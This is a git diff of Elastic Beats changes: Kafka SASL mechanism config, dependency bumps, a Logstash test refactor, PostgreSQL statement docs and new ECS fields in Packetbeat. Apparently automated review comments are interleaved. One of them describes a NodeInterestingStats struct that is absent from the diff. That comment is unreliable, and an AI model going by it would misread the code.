-1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 COPY test/main.go main.go diff --git a/metricbeat/module/kafka/_meta/config.yml b/metricbeat/module/kafka/_meta/config.yml index ac3fb92b72d..d20a957cc9f 100644 --- a/metricbeat/module/kafka/_meta/config.yml +++ b/metricbeat/module/kafka/_meta/config.yml @@ -30,6 +30,10 @@ #username: "" #password: "" + # SASL authentication mechanism used. Can be one of PLAIN, SCRAM-SHA-256 or SCRAM-SHA-512. + # Defaults to PLAIN when `username` and `password` are configured. + #sasl.mechanism: '' + # Metrics collected from a Kafka broker using Jolokia #- module: kafka # metricsets: diff --git a/metricbeat/module/kafka/broker.go b/metricbeat/module/kafka/broker.go index 2e558d7944a..11bc0ac2c5c 100644 --- a/metricbeat/module/kafka/broker.go 
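Review bot: In `NodeInterestingStats` only `GetHits` and `Ops` move to `float64`, while `CurrItems`, `CurrItemsTot`, `EpBgFetched`, `MemUsed` and `VbReplicaCurrItems` stay `int64`, and nothing in the struct says why these two differ. `encoding/json` returns an error when a number with a fractional part is decoded into an `int64` field, so a fractional value in any of the remaining fields would fail the fetch the same way these two presumably did. If the server reports only these two as rates, a comment such as `// GetHits and Ops are per-second rates and may be fractional; the remaining fields are counts.` would record that. Otherwise the other fields want the same treatment. The struct starts outside the hunk.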
+++ b/metricbeat/module/kafka/broker.go @@ -60,6 +60,7 @@ type BrokerSettings struct { TLS *tls.Config Username, Password string Version kafka.Version + Sasl kafka.SaslConfig } type GroupDescription struct { @@ -91,6 +92,7 @@ func NewBroker(host string, settings BrokerSettings) *Broker { cfg.Net.SASL.Enable = true cfg.Net.SASL.User = user cfg.Net.SASL.Password = settings.Password + settings.Sasl.ConfigureSarama(cfg) } cfg.Version, _ = settings.Version.Get() diff --git a/metricbeat/module/kafka/config.go b/metricbeat/module/kafka/config.go index 8d42af9982b..e3e4aa11866 100644 --- a/metricbeat/module/kafka/config.go +++ b/metricbeat/module/kafka/config.go @@ -21,6 +21,7 @@ import ( "fmt" "time" + "github.com/elastic/beats/v7/libbeat/common/kafka" "github.com/elastic/beats/v7/libbeat/common/transport/tlscommon" ) @@ -31,6 +32,7 @@ type metricsetConfig struct { Username string `config:"username"` Password string `config:"password"` ClientID string `config:"client_id"` + Sasl kafka.SaslConfig `config:"sasl"` } var defaultConfig = metricsetConfig{ diff --git a/metricbeat/module/kafka/metricset.go b/metricbeat/module/kafka/metricset.go index 5ec46332b35..ee46788f0f9 100644 --- a/metricbeat/module/kafka/metricset.go +++ b/metricbeat/module/kafka/metricset.go @@ -64,6 +64,7 @@ func NewMetricSet(base mb.BaseMetricSet, options MetricSetOptions) (*MetricSet, Username: config.Username, Password: config.Password, Version: Version(options.Version), + Sasl: config.Sasl, } return &MetricSet{ diff --git a/metricbeat/module/kubernetes/_meta/terraform/eks/requirements.txt b/metricbeat/module/kubernetes/_meta/terraform/eks/requirements.txt index 3d918ee911a..d1a2239bbcb 100644 --- a/metricbeat/module/kubernetes/_meta/terraform/eks/requirements.txt +++ b/metricbeat/module/kubernetes/_meta/terraform/eks/requirements.txt @@ -5,7 +5,7 @@ docutils==0.15.2 jmespath==0.9.5 pyasn1==0.4.8 python-dateutil==2.8.1 -PyYAML==5.3.1 +PyYAML==5.4.1 rsa==3.4.2 s3transfer==0.3.3 six==1.14.0 
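Review bot: In `NewBroker` the new `settings.Sasl.ConfigureSarama(cfg)` call appears to sit inside the branch that runs only when a username is set (the condition is outside the hunk), and nothing visible ties it to `settings.TLS`. The config comments added in this commit say the mechanism defaults to PLAIN, and with PLAIN over a connection without TLS the password is readable on the wire. That dependency deserves to be stated where the setting is declared. On the `Sasl` field of `BrokerSettings` I would add `// Sasl selects the SASL mechanism; it has no effect unless Username is set. With PLAIN, configure TLS so the password is not sent in the clear.`. `ConfigureSarama` is defined outside this diff, so it cannot be seen here whether an unknown mechanism string is rejected or silently falls back to PLAIN; that is worth confirming.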
diff --git a/metricbeat/module/logstash/logstash_integration_test.go b/metricbeat/module/logstash/logstash_integration_test.go index ffaed41a4e6..42173442efc 100644 --- a/metricbeat/module/logstash/logstash_integration_test.go +++ b/metricbeat/module/logstash/logstash_integration_test.go @@ -25,6 +25,7 @@ import ( "net/http" "testing" + "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/libbeat/tests/compose" @@ -84,14 +85,20 @@ func TestXPackEnabled(t *testing.T) { config := getXPackConfig(lsService.Host()) metricSets := mbtest.NewReportingMetricSetV2Errors(t, config) for _, metricSet := range metricSets { - events, errs := mbtest.ReportingFetchV2Error(metricSet) - require.Empty(t, errs) - require.NotEmpty(t, events) - - event := events[0] - require.Equal(t, metricSetToTypeMap[metricSet.Name()], event.RootFields["type"]) - require.Equal(t, clusterUUID, event.RootFields["cluster_uuid"]) - require.Regexp(t, `^.monitoring-logstash-\d-mb`, event.Index) + t.Run(metricSet.Name(), func(t *testing.T) { + events, errs := mbtest.ReportingFetchV2Error(metricSet) + require.Empty(t, errs) + require.NotEmpty(t, events) + + event := events[0] + assert.Equal(t, metricSetToTypeMap[metricSet.Name()], event.RootFields["type"]) + assert.Equal(t, clusterUUID, event.RootFields["cluster_uuid"]) + assert.Regexp(t, `^.monitoring-logstash-\d-mb`, event.Index) + + if t.Failed() { + t.Logf("event: %+v", event) + } + }) } } diff --git a/metricbeat/module/postgresql/_meta/config.reference.yml b/metricbeat/module/postgresql/_meta/config.reference.yml index f27874eee36..3b4ed4579d1 100644 --- a/metricbeat/module/postgresql/_meta/config.reference.yml +++ b/metricbeat/module/postgresql/_meta/config.reference.yml 
@@ -10,6 +10,10 @@ # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/module/postgresql/statement/_meta/docs.asciidoc b/metricbeat/module/postgresql/statement/_meta/docs.asciidoc index 6c188dce2d9..20f295c1170 100644 --- a/metricbeat/module/postgresql/statement/_meta/docs.asciidoc +++ b/metricbeat/module/postgresql/statement/_meta/docs.asciidoc 
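Review bot: The added comment names the library `pg_stats_statement`, but the metricset documentation added in this same change refers to the `pg_stat_statements` view and sets `shared_preload_libraries = 'pg_stat_statements'`. An operator copying the name from this reference file would try to preload a library under the wrong name. The comment should use `pg_stat_statements`. If this text is generated into other reference configs (not visible here), the source of the comment is the place to fix it.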
@@ -1 +1,41 @@ This is the `statement` metricset of the PostgreSQL module. + +This module collects information from the `pg_stat_statements` view, that keeps +track of planning and execution statistics of all SQL statements executed by +the server. + +`pg_stat_statements` is included by an additional module in PostgreSQL. This +module requires additional shared memory, and is disabled by default. + +You can enable it by adding this module to the configuration as a shared +preloaded library. + +["source"] +------------------------------------------- +shared_preload_libraries = 'pg_stat_statements' +pg_stat_statements.max = 10000 +pg_stat_statements.track = all +------------------------------------------- + +NOTE: Preloading this library in your server will increase the memory usage of +your PostgreSQL server. Use it with care. + +Once the server is started with this module, it starts collecting statistics +about all statements executed. To make these statistics available in the +`pg_stat_statements` view, the following statement needs to be executed in the +server: + +["source","sql"] +------------------------------------------- +CREATE EXTENSION pg_stat_statements; +------------------------------------------- + +You can read more about the available options for this module in the +https://www.postgresql.org/docs/13/pgstatstatements.html[official documentation]. + +NOTE: The PostgreSQL module of Filebeat is also able to collect information +about statements executed in the server from its logs. You may chose which one +is better for your needings. An important difference is that the Metricbeat +module collects aggregated information when the statement is executed several +times, but cannot know when each statement was executed. This information can be +obtained from logs. diff --git a/metricbeat/modules.d/kafka.yml.disabled b/metricbeat/modules.d/kafka.yml.disabled index 089e722028c..1e0db5d517b 100644 --- a/metricbeat/modules.d/kafka.yml.disabled 
+++ b/metricbeat/modules.d/kafka.yml.disabled @@ -33,6 +33,10 @@ #username: "" #password: "" + # SASL authentication mechanism used. Can be one of PLAIN, SCRAM-SHA-256 or SCRAM-SHA-512. + # Defaults to PLAIN when `username` and `password` are configured. + #sasl.mechanism: '' + # Metrics collected from a Kafka broker using Jolokia #- module: kafka # metricsets: diff --git a/packetbeat/Dockerfile b/packetbeat/Dockerfile index 416f99f900d..fa09b50a228 100644 --- a/packetbeat/Dockerfile +++ b/packetbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/packetbeat/README.md b/packetbeat/README.md index fb164d1dc49..fcda826edbf 100644 --- a/packetbeat/README.md +++ b/packetbeat/README.md @@ -13,7 +13,7 @@ For each transaction, the shipper inserts a JSON document into Elasticsearch, where it is stored and indexed. You can then use Kibana to view key metrics and do ad-hoc queries against the data. -To learn more about Packetbeat, check out . +To learn more about Packetbeat, check out . ## Getting started diff --git a/packetbeat/cmd/root.go b/packetbeat/cmd/root.go index e2fbb373d2f..5a9d0d4f91e 100644 --- a/packetbeat/cmd/root.go +++ b/packetbeat/cmd/root.go @@ -37,7 +37,7 @@ const ( Name = "packetbeat" // ecsVersion specifies the version of ECS that Packetbeat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/packetbeat/docs/fields.asciidoc b/packetbeat/docs/fields.asciidoc index 2315a70bb9b..22e6a15621a 100644 --- a/packetbeat/docs/fields.asciidoc +++ b/packetbeat/docs/fields.asciidoc @@ -508,6 +508,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cassandra]] == Cassandra fields 
@@ -2385,6 +2394,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -2442,6 +2462,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -2464,6 +2496,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -2477,9 +2520,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -2794,6 +2840,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -2811,6 +2869,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- 
@@ -2834,6 +2904,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -3000,6 +3082,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -3057,6 +3150,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -3079,6 +3184,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -3092,9 +3208,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -3313,6 +3432,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- 
@@ -3336,6 +3467,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -3396,6 +3539,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -4141,6 +4293,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -4164,6 +4328,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -4312,6 +4488,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -4802,6 +4987,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -4859,6 +5055,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- 
@@ -4881,6 +5089,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -4918,8 +5137,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -4958,6 +5178,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host @@ -4976,6 +5205,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -4999,6 +5257,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- 
@@ -5056,6 +5325,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -5078,6 +5359,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -5111,10 +5403,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: @@ -5127,6 +5422,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- 
@@ -5404,6 +5735,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -5937,7 +6280,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -6001,7 +6344,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -6020,6 +6363,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -6077,6 +6431,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- 
@@ -6099,6 +6465,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -6111,7 +6488,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -6175,7 +6552,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -6195,10 +6572,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -6768,6 +7148,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- 
@@ -6791,6 +7183,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -6913,6 +7317,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- @@ -6967,6 +7380,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -6990,6 +7415,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -7112,6 +7549,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -7850,6 +8296,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -7907,6 +8364,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- 
@@ -7929,6 +8398,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- @@ -7942,9 +8422,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -8312,6 +8795,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -8369,6 +8863,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -8391,6 +8897,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -8404,9 +8921,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/packetbeat/flows/worker.go b/packetbeat/flows/worker.go index 2a9ca482ed3..f0080cf68d2 100644 --- a/packetbeat/flows/worker.go +++ b/packetbeat/flows/worker.go 
@@ -220,6 +220,12 @@ func createEvent( "category": []string{"network"}, "action": "network_flow", } + eventType := []string{"connection"} + if isOver { + eventType = append(eventType, "end") + } + event["type"] = eventType + flow := common.MapStr{ "id": common.NetString(f.id.Serialize()), "final": isOver, diff --git a/packetbeat/include/fields.go b/packetbeat/include/fields.go index 9b5aa85f182..0b96fcbb14b 100644 --- a/packetbeat/include/fields.go +++ b/packetbeat/include/fields.go 
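Review bot: The new `event["type"]` value has no comment explaining the mapping, and the choice is not obvious without knowing ECS. Every flow report is tagged `connection`, and only the final one (`isOver`) additionally gets `end`. A one-line comment above `eventType` would help anyone writing detections on `event.type`, e.g. `// ECS event.type: always "connection"; the last report of a flow also carries "end".` createEvent starts and ends outside the hunk.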
@@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "eJzs/XtzGzmSKIr/358CP23ET/YsVSL1sqx7J+KoJXW3Yv3QWPL0bI83JLAKJDGqAqoBlGj2if3uN5AJoFAPSZQt2m6PZs9xi2QVkEgk8oV8/Af59fDdm9M3P///yLEkQhrCMm6ImXFNJjxnJOOKpSZfDAg3ZE41mTLBFDUsI+MFMTNGTo7OSankv1hqBj/8BxlTzTIiBXx/w5TmUpBRsp8Mkx/+g5zljGpGbrjmhsyMKfXB5uaUm1k1TlJZbLKcasPTTZZqYiTR1XTKtCHpjIopg6/ssBPO8kwnP/ywQa7Z4oCwVP9AiOEmZwf2gR8IyZhOFS8NlwK+Ij+5d4h7++AHQjaIoAU7IOv/x/CCaUOLcv0HQgjJ2Q3LD0gqFYPPiv1eccWyA2JUhV+ZRckOSEYNfmzMt35MDdu0Y5L5jAlAE7thwhCp+JQLi77kB3iPkAuLa67hoSy8xz4aRVOL5omSRT3CwE7MU5rnC6JYqZhmwnAxhYnciPV0vRumZaVSFuY/nUQv4G9kRjUR0kObk4CeAZLGDc0rBkAHYEpZVrmdxg3rJptwpQ283wJLsZTxmxqqkpcs56KG653DOe4XmUhFaJ7jCDrBfWIfaVHaTV/fGo72Noa7G1vbF8P9g+HuwfZOsr+7/dt6tM05HbNc924w7qYcWyqGL/DPS/z+mi3mUmU9G31UaSML+8Am4qSkXOmwhiMqyJiRyh4JIwnNMlIwQwkXE6kKagex37s1kfOZrPIMjmEqhaFcEMG03ToEB8jX/u8wz3EPNKGKEW2kRRTVHtIAwIlH0FUm02umrggVGbm63tdXDh0dTP7fNVqWOU8BurUDsjaRcmNM1dqArDFxY78plcyqFH7/3xjBBdOaTtkdGDbso+lB409SkVxOHSKAHtxYbvcdOvAn+6T7eUBkaXjB/wh0Z+nkhrO5PRNcEApP2y+YClix02mjqtRUFm+5nGoy52YmK0OoqMm+AcOASDNjyrEPkuLWplKk1DARUb6RFoiCUDKrCio2FKMZHeeM6KooqFoQGZ24+BgWVW54mYe1a8I+cm2P/Iwt6gmLMRcsI1wYSaQIT7c38heW55L8KlWeRVtk6PSuExBTOp8KqdglHcsbdkBGw62d7s694trY9bj3dCB1Q6eE0XTmV9mksX/GJIR0tbX2PzEp0SkTSCmOrR+GL6ZKVuUB2eqho4sZwzfDLrlj5JgrJXRsNxnZ4MTM7emxDNRYATdxW0HFwuKc2lOY5/bcDUjGDP4hFZFjzdSN3R4kV2nJbCbtTklFDL1mmhSM6kqxwj7ghg2PtU+nJlykeZUx8iOjlg/AWjUp6ILQXEuiKmHfdvMqnYBEg4Umf3FLdUPqmWWSY1bzY6BsCz/lufa0h0hSlRD2nEhEkIUtWp9yQ85nTMXce0bLklkKtIuFkxqWCpzdIkA4apxIaYQ0ds/9Yg/IKU6XWk1ATnDRcG7tQRzU8CWWFIjTRMaMmiQ6v4dnr0EncZKzuSC347QsN+1SeMoSUtNGzH0zyTzqgO2CokH4BKmFa2LlKzEzJavpjPxescqOrxfasEKTnF8z8l90ck0H5B3LONJHqWTKtOZi6jfFPa6rdGa59Cs51YbqGcF1kHNAt0MZHkQgckRhUFfq0zGueJ4lnk+5Wdonuu9M33qq2yfp5KNhIrPi2U7VQNnE7Tvukadlp8ggu7YajXADGBlOIRWLnvHgpFFEOOofYUh7Akolb3jGBlYh0SVL+YSnBN8GxYfroJ45DEacpmBG8dTSTtBFXyR7yZA8o0W2t/N8QHI+hp/x63/u0a1ttj/Zn2wPJ7vD4WhMt3d22A7
